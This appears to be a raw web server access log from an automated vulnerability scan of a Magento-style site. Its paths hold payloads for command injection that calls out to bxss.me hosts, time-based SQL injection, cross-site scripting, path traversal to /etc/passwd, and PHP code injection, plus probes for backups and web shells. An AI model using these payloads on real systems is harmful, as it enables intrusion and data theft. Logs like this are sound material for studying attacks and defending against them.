/%3b(nslookup%20hitomsrhbltcdc242b.bxss.me||perl%20-e%20\"gethostbyname('hitomsrhbltcdc242b.bxss.me')\")|(nslookup%20hitomsrhbltcdc242b.bxss.me||perl%20-e%20\"gethostbyname('hitomsrhbltcdc242b.bxss.me')\")&(nslookup%20hitomsrhbltcdc242b.bxss.me||perl%20-e% 1 -
/104_dump.sql.gz 1 -
/`(nslookup%20hitjicqattict35d21.bxss.me||perl%20-e%20\"gethostbyname('hitjicqattict35d21.bxss.me')\")`/skin/install/default/default/css/boxes.css 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/prototype.js 1 -
/acc/index.php/install/wizard/config/..%2f..%2fpackage.json 1 -
/acc/skin/install/default/default/1some_inexistent_file_with_long_name%00.jpg/ie7minus.css 1 https://104.36.149.61/
/-1%20OR%203+53-53-1=0+0+0+1/skin/adminhtml/default/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/adminhtml/ 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/backup.js 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/product/ 1 https://104.36.149.61/
/-1%20OR%203+234-234-1=0+0+0+1/js/prototype/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/form.js 1 -
/acc/js/%3b(nslookup%20hittfibrzqakn21594.bxss.me||perl%20-e%20\"gethostbyname('hittfibrzqakn21594.bxss.me')\")|(nslookup%20hittfibrzqakn21594.bxss.me||perl%20-e%20\"gethostbyname('hittfibrzqakn21594.bxss.me')\")&(nslookup%20hittfibrzqakn21594.bxss.me||per 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/windows/themes/ 1 -
/'+response.write(9274377*9995990)+'/js/prototype/debug.js 1 -
/recentservers.xml 1 -
//../../../../../../../../etc/passwd%00 1 -
/response.write(9274377*9995990)/js/prototype/debug.js 1 -
//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
/acc/js/prototype/windows/%2fxfs.bxss.me/ 1 -
/include/extjs//examples/feed-viewer/feed-proxy.php 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>WvSu(9492)<%2fScRiPt>/adminhtml/events.js 1 https://104.36.149.61/
/acc/skin/install/default/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/boxes.css 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/form.js 1 https://104.36.149.61/
/includes/tiny_mce 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/accordion.js 1 -
/config.rb 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>XkUp(9310)<%2fScRiPt>/adminhtml/uploader/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/default/ 1 https://104.36.149.61/
/'\"/js/mage/adminhtml/events.js 1 -
/^(%23$!@%23$)(()))******/js/prototype/windows/ 1 https://104.36.149.61/
/bxss.me/js/varien/form.js 1 https://104.36.149.61/
/acc/js/mage/%3b(nslookup%20hitybkqxgfiwy6977b.bxss.me||perl%20-e%20\"gethostbyname('hitybkqxgfiwy6977b.bxss.me')\")|(nslookup%20hitybkqxgfiwy6977b.bxss.me||perl%20-e%20\"gethostbyname('hitybkqxgfiwy6977b.bxss.me')\")&(nslookup%20hitybkqxgfiwy6977b.bxss.me 1 -
/acc/js/mage/%3b(nslookup%20hitacwtqrhmxue91e3.bxss.me||perl%20-e%20\"gethostbyname('hitacwtqrhmxue91e3.bxss.me')\")|(nslookup%20hitacwtqrhmxue91e3.bxss.me||perl%20-e%20\"gethostbyname('hitacwtqrhmxue91e3.bxss.me')\")&(nslookup%20hitacwtqrhmxue91e3.bxss.me 1 -
/acc/js/.%2fmage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/translate.js 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/product/ 1 -
/HKDnKzgl 1 -
//js/mage/adminhtml/ 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/ie7minus.css 1 -
/acc/skin/install/default/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/iestyles.css 1 -
/acc/index.php/%2fxfs.bxss.me/wizard/config/ 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/prototype/debug.js 1 -
/acc/js/prototype/windows<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/themes/ 1 -
/inc/tinymce 1 -
/pom.xml 1 -
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/default/css/ie7minus.css 1 https://104.36.149.61/
/.viminfo 1 -
/acc/skin/install/default/default/css/bxss.me%2ft%2fxss.html%3f%2500.css 1 -
/!(()&&!|*|*|/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc9154588/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/frontend/ 1 -
/i.php 1 -
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/ 1 -
/@@f3wjt/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/`(nslookup%20hitbsbnwfyebn8ae0e.bxss.me||perl%20-e%20\"gethostbyname('hitbsbnwfyebn8ae0e.bxss.me')\")`/js/mage/translate.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/tooltip_manager.js 1 -
/'\"/js/prototype/windows/ 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/includes/ofc/php/ofc_upload_image.php 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype/debug.js 1 https://104.36.149.61/
/!(()&&!|*|*|/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/install/../../../../Gemfile 1 -
/login.action 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/ 1 -
/acc/skin/install/.%2fdefault/default/css/ie7minus.css 1 https://104.36.149.61/
/cgi-bin/../../../../../../../../../../../../../etc/shells 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'2nN2'='2nN2/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/form.js 1 https://104.36.149.61/
/'+response.write(9275102*9941646)+'/js/mage/adminhtml/grid.js 1 -
/acc/skin/install/default/1some_inexistent_file_with_long_name%00.jpg/css/iestyles.css 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/104.36.149.61-backup.7z 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/extended_debug.js 1 https://104.36.149.61/
/svs3OxjY'))%20OR%20543=(SELECT%20543%20FROM%20PG_SLEEP(15))--/skin/install/default/ 1 https://104.36.149.61/
/database.tar 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/ 1 https://104.36.149.61/
/%3b(nslookup%20hitluxgoqgxgx47dee.bxss.me||perl%20-e%20\"gethostbyname('hitluxgoqgxgx47dee.bxss.me')\")|(nslookup%20hitluxgoqgxgx47dee.bxss.me||perl%20-e%20\"gethostbyname('hitluxgoqgxgx47dee.bxss.me')\")&(nslookup%20hitluxgoqgxgx47dee.bxss.me||perl%20-e% 1 -
/acc/index.php/install/wizard/beginPost//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
/acc/skin/adminhtml'\"()&%25<acx><ScRiPt%20>gumy(9425)<%2fScRiPt>/default/ 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(116).concat(71).concat(106).concat(69)+(require'socket'%0aSocket.gethostbyname('hitxm'+'mmpxncso3ed18.bxss.me.')[3].to_s)+'/skin/install/default/default/css/reset.css 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/grid.js 1 -
/actuator/gateway/routes 6 -
/.%2facc/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/skin/'\"()&%25<acx><ScRiPt%20>eCQQ(9529)<%2fScRiPt>/default/default/css/clears.css 1 https://104.36.149.61/
/$(nslookup%20hitdnaomehjmza0940.bxss.me||perl%20-e%20\"gethostbyname('hitdnaomehjmza0940.bxss.me')\")/js/mage/adminhtml/browser.js 1 -
/libs/extjs//examples/feed-viewer/feed-proxy.php 1 -
/|echo%20kbeyor$()\\%20odskgo\\nz^xyu||a%20%23'%20|echo%20kbeyor$()\\%20odskgo\\nz^xyu||a%20%23|\"%20|echo%20kbeyor$()\\%20odskgo\\nz^xyu||a%20%23/skin/install/default/default/css/reset.css 1 -
/FRTfCNTY')%20OR%20540=(SELECT%20540%20FROM%20PG_SLEEP(15))--/index.php/install/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/skin/install/default/default/css/reset.css 1 -
/acc/skin/install/default/.%2fdefault/css/reset.css 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/${9999264+9999519}/js/mage/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(113).concat(83).concat(113).concat(74)+(require'socket'%0aSocket.gethostbyname('hitmb'+'tsbpqftye5e1e.bxss.me.')[3].to_s)+'/skin/install/default/default/css/clears.css 1 -
/${@print(md5(31337))}/js/varien/js.js 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'kyDI'!='kyDI%25/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/104.36.149.61-dump.tar.gz 1 -
/'+response.write(9493101*9558622)+'/skin/install/default/default/css/boxes.css 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/translate.js 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitzm\".\"sqvrgisr836f3.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(100).chr(85).chr(111).chr(73).\"/js/mage/adminhtml/product/ 1 -
/cgi-bin/luci 1 -
/acc/skin/install/.%2fdefault/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../windows/win.ini%00en 1 -
/bxss.me/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/form.js 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/wysiwyg/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/ 1 https://104.36.149.61/
/acc/skin/install/default/default'\"()&%25<acx><ScRiPt%20>c1E3(9298)<%2fScRiPt>/css/ie7minus.css 1 https://104.36.149.61/
/iw5aeaAE/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/giftmessage.js 1 https://104.36.149.61/
/1'\"/js/prototype/validation.js 1 https://104.36.149.61/
///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/'.gethostbyname(lc('hitvv'.'ebvnxnbr276cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(74).chr(118).chr(89).'/js/prototype/windows/themes/ 1 -
/${@print(md5(31337))}\\/js/mage/translate.js 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(118).concat(74).concat(110).concat(79)+(require\"socket\"%0aSocket.gethostbyname(\"hitww\"+\"wqblkzpz37888.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/browser.js 1 -
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/default/css/ie7minus.css 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'u4ut'!='u4ut%25/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/<!--/skin/install/default/default/css/clears.css 1 -
/echo%20xqjkoq$()\\%20esovgf\\nz^xyu||a%20%23'%20&echo%20xqjkoq$()\\%20esovgf\\nz^xyu||a%20%23|\"%20&echo%20xqjkoq$()\\%20esovgf\\nz^xyu||a%20%23/js/mage/adminhtml/grid.js 1 -
/..%2facc/index.php/install/ 1 https://104.36.149.61/
/acc/js/prototype/windows'\"()&%25<acx><ScRiPt%20>JN5X(9845)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/magento-all.js/943095%40 1 https://104.36.149.61/
/c-h.v2.php 1 -
//js/scriptaculous/effects.js 1 https://104.36.149.61/
/(nslookup%20hitntllqcdtkx232a5.bxss.me||perl%20-e%20\"gethostbyname('hitntllqcdtkx232a5.bxss.me')\")/js/prototype/windows/themes/ 1 -
//../../../../../../../../windows/win.ini%00.jpg 1 -
/acc9560729/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/adminer-4.3.1-en.php 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitybpetjznkde7436.bxss.me||perl%20-e%20\"gethostbyname('hitybpetjznkde7436.bxss.me')\")|(nslookup%20hitybpetjznkde7436.bxss.me||perl%20-e%20\"gethostbyname('hitybpetjznkde7436.bxss.me')\")&(nslookup%20hitybpetjznkde7436.bxss.me||perl%2 1 -
/acc/skin/install/default/default'\"()&%25<acx><ScRiPt%20>Lssw(9759)<%2fScRiPt>/ 1 https://104.36.149.61/
/adminer-4.6.0-mysql.php 1 https://104.36.149.61/
/acc/js/.%2fmage/translate.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/../../../../../package.json 1 -
/backup_104.rar 1 -
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitnyoyapoenc36549.bxss.me||perl%20-e%20\"gethostbyname('hitnyoyapoenc36549.bxss.me')\")|(nslookup%20hitnyoyapoenc36549.bxss.me||perl%20-e%20\"gethostbyname('hitnyoyapoenc36549.bxss.me')\")&(nslookup%20hitnyoyapoenc36549.bxss.me||perl%2 1 -
/\"+response.write(9077201*9826036)+\"/js/mage/translate.js 1 -
/.%2facc/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
//index.php/api/xmlrpc 1 -
/Autodiscover/Autodiscover.xml 21 -
/cgi-bin/Vagrantfile.backup 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/extended_debug.js 1 https://104.36.149.61/
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>gJZT(9816)<%2fScRiPt>/product/ 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/image.js 1 https://104.36.149.61/
/Adminer.php 1 https://104.36.149.61/
/tiny_mce 1 -
/acc/index.php/install'\"()&%25<acx><ScRiPt%20>KhMd(9951)<%2fScRiPt>/wizard/config/ 1 https://104.36.149.61/
/acc/skin/install/default/default/css/..%2fboxes.css 1 https://104.36.149.61/
/acc/index.php/install//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/!(()&&!|*|*|/skin/frontend/ 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/uploader/ 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype/ 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/xmlrpc/soapserver.php 4 -
/includes/tinymce 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>KwaQ(9342)<%2fScRiPt>/prototype/debug.js 1 https://104.36.149.61/
/acc/js/prototype/windows/.%2fthemes/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/prototype/windows/themes/ 1 https://104.36.149.61/
/response.write(9873402*9230071)/js/prototype/tooltip_manager.js 1 -
/${@print(md5(31337))}/index.php/install/wizard/config/ 1 -
/acc/js/mage/adminhtml/hash.js/933389%40 1 https://104.36.149.61/
/response.write(9275102*9941646)/js/mage/adminhtml/grid.js 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/default/ 1 -
/cgi-bin/.sqlite_history 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/ 1 https://104.36.149.61/
/|(nslookup%20hitqkmviftrao21381.bxss.me||perl%20-e%20\"gethostbyname('hitqkmviftrao21381.bxss.me')\")/js/prototype/validation.js 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/wizard/locale/ 1 -
/acc'||'/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/events.js 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/frontend/ 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/grid.js 1 -
/.gitignore 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/giftmessage.js 1 https://104.36.149.61/
//.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\windows/win.ini 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/varien/js.js 1 https://104.36.149.61/
//./WEB-INF/web.xml%00.jsp 1 -
/adminer-4.6.1.php 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(73).concat(103).concat(67)+(require\"socket\"%0aSocket.gethostbyname(\"hitwd\"+\"szdtwlkf2ceee.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/hash.js 1 -
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>dgnk(9703)<%2fScRiPt>/default/css/iestyles.css 1 https://104.36.149.61/
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'3XI1'!='3XI1%25/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/..%2fjs/prototype/validation.js 1 https://104.36.149.61/
/acc/js/%2fxfs.bxss.me/adminhtml/giftmessage.js 1 -
/echo%20qgrzab$()\\%20nmryvk\\nz^xyu||a%20%23'%20&echo%20qgrzab$()\\%20nmryvk\\nz^xyu||a%20%23|\"%20&echo%20qgrzab$()\\%20nmryvk\\nz^xyu||a%20%23/js/mage/ 1 -
/acc/.%2fjs/prototype/windows/themes/ 1 https://104.36.149.61/
/(nslookup%20hityzhwsjqihw98043.bxss.me||perl%20-e%20\"gethostbyname('hityzhwsjqihw98043.bxss.me')\")/js/prototype/tooltip_manager.js 1 -
/acc/index.php/install/wizard/beginPost///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/&echo%20erdwfn$()\\%20nqyikc\\nz^xyu||a%20%23'%20&echo%20erdwfn$()\\%20nqyikc\\nz^xyu||a%20%23|\"%20&echo%20erdwfn$()\\%20nqyikc\\nz^xyu||a%20%23/skin/install/default/default/css/ie7minus.css 1 -
/xmlrpc.aspx 4 -
/1%00%c0%a7%c0%a2%252527%252522/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/(nslookup%20hitozgaipmwaycf449.bxss.me||perl%20-e%20\"gethostbyname('hitozgaipmwaycf449.bxss.me')\")/skin/install/default/ 1 -
/&echo%20whsall$()\\%20qrqbia\\nz^xyu||a%20%23'%20&echo%20whsall$()\\%20qrqbia\\nz^xyu||a%20%23|\"%20&echo%20whsall$()\\%20qrqbia\\nz^xyu||a%20%23/js/mage/adminhtml/uploader/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/windows/themes/ 1 -
/$(nslookup%20hitrqwwabztvl776ec.bxss.me||perl%20-e%20\"gethostbyname('hitrqwwabztvl776ec.bxss.me')\")/js/mage/translate.js 1 -
/104-db.rar 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/index.php/install/ 1 https://104.36.149.61/
//\\../\\../\\../\\../\\../\\../\\../\\../etc/passwd 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'Ke4j'!='Ke4j%25/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(120).concat(84).concat(122).concat(87)+(require'socket'%0aSocket.gethostbyname('hitse'+'ksgapwakf7564.bxss.me.')[3].to_s)+'/js/prototype/ 1 -
/acc/index.php/install/..%2f..%2f..%2f..%2fweb.config 1 -
/response.write(9582389*9888668)/js/mage/adminhtml/browser.js 1 -
/'.gethostbyname(lc('hithm'.'aewtxfzm8f3f9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(67).chr(113).chr(89).'/js/prototype/prototype.js 1 -
//..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/windows/win.ini 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitqdnmntqcesd7f3a.bxss.me||perl%20-e%20\"gethostbyname('hitqdnmntqcesd7f3a.bxss.me')\")|(nslookup%20hitqdnmntqcesd7f3a.bxss.me||perl%20-e%20\"gethostbyname('hitqdnmntqcesd7f3a.bxss.me')\")&(nslookup%20hitqdnmntqcesd7f3a.bxss.me||perl%2 1 -
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/css/ie7minus.css 1 -
/ckeditor 1 -
/acc/js/mage/%3b(nslookup%20hitsoydkgazlxc1234.bxss.me||perl%20-e%20\"gethostbyname('hitsoydkgazlxc1234.bxss.me')\")|(nslookup%20hitsoydkgazlxc1234.bxss.me||perl%20-e%20\"gethostbyname('hitsoydkgazlxc1234.bxss.me')\")&(nslookup%20hitsoydkgazlxc1234.bxss.me 1 -
/authenticationendpoint/update.jsp 1 -
/L0mORwdi')%20OR%20927=(SELECT%20927%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/c99shell.php 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/index.php/install/ 1 https://104.36.149.61/
/cgi-bin/._env 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitjr'.'nluhahbl0f811.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(70).chr(103).chr(69).'/js/mage/adminhtml/events.js 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/frontend/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/js/prototype/windows/themes'\"()&%25<acx><ScRiPt%20>sjVf(9979)<%2fScRiPt>/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/skin/adminhtml/ 1 -
/acc/..%2fjs/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hitsxssckcdvcaa7f3.bxss.me||perl%20-e%20\"gethostbyname('hitsxssckcdvcaa7f3.bxss.me')\")|(nslookup%20hitsxssckcdvcaa7f3.bxss.me||perl%20-e%20\"gethostbyname('hitsxssckcdvcaa7f3.bxss.me')\")&(nslookup%20hitsxssckcdvcaa7f3.bxss.me||per 1 -
/lib/tinymce 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'WKXD'='WKXD/js/prototype/validation.js 1 https://104.36.149.61/
/..%2facc/skin/frontend/ 1 https://104.36.149.61/
/userportal/Controller 1 -
//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd 1 -
/&(nslookup%20hitcxnbnftpntcd9af.bxss.me||perl%20-e%20\"gethostbyname('hitcxnbnftpntcd9af.bxss.me')\")&'\\\"`0&(nslookup%20hitcxnbnftpntcd9af.bxss.me||perl%20-e%20\"gethostbyname('hitcxnbnftpntcd9af.bxss.me')\")&`'/skin/install/default/default/css/clears.c 1 -
/\".gethostbyname(lc(\"hityv\".\"tvrhvtroe1942.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(122).chr(69).chr(102).chr(83).\"/js/mage/translate.js 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/grid.js 1 https://104.36.149.61/
/104-backup.tar 1 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/database.yml.pgsql 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>gf47(9661)<%2fScRiPt>/ 1 https://104.36.149.61/
/editor/tiny_mce 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../etc/passwd%00.jsp 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(99).concat(85).concat(105).concat(79)+(require\"socket\"%0aSocket.gethostbyname(\"hitci\"+\"mtghpzcg17b62.bxss.me.\")[3].to_s)+\"/js/prototype/prototype.js 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>sGFI(9548)<%2fScRiPt>/tooltip.js 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/giftmessage.js 1 -
/&(nslookup%20hitlwnzyxlpej9a557.bxss.me||perl%20-e%20\"gethostbyname('hitlwnzyxlpej9a557.bxss.me')\")&'\\\"`0&(nslookup%20hitlwnzyxlpej9a557.bxss.me||perl%20-e%20\"gethostbyname('hitlwnzyxlpej9a557.bxss.me')\")&`'/skin/install/default/default/css/boxes.cs 1 -
/cgi-bin/.zshrc 1 -
/%3b(nslookup%20hitpupgzwmerl9e5eb.bxss.me||perl%20-e%20\"gethostbyname('hitpupgzwmerl9e5eb.bxss.me')\")|(nslookup%20hitpupgzwmerl9e5eb.bxss.me||perl%20-e%20\"gethostbyname('hitpupgzwmerl9e5eb.bxss.me')\")&(nslookup%20hitpupgzwmerl9e5eb.bxss.me||perl%20-e% 1 -
/acc/index.php/install/wizard/beginPost//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
/JCKHnz1m'))%20OR%20290=(SELECT%20290%20FROM%20PG_SLEEP(15))--/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/|echo%20fknabk$()\\%20jhpiow\\nz^xyu||a%20%23'%20|echo%20fknabk$()\\%20jhpiow\\nz^xyu||a%20%23|\"%20|echo%20fknabk$()\\%20jhpiow\\nz^xyu||a%20%23/js/prototype/windows/themes/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>JN5X(9032)<%2fScRiPt>/js/prototype/windows/ 1 https://104.36.149.61/
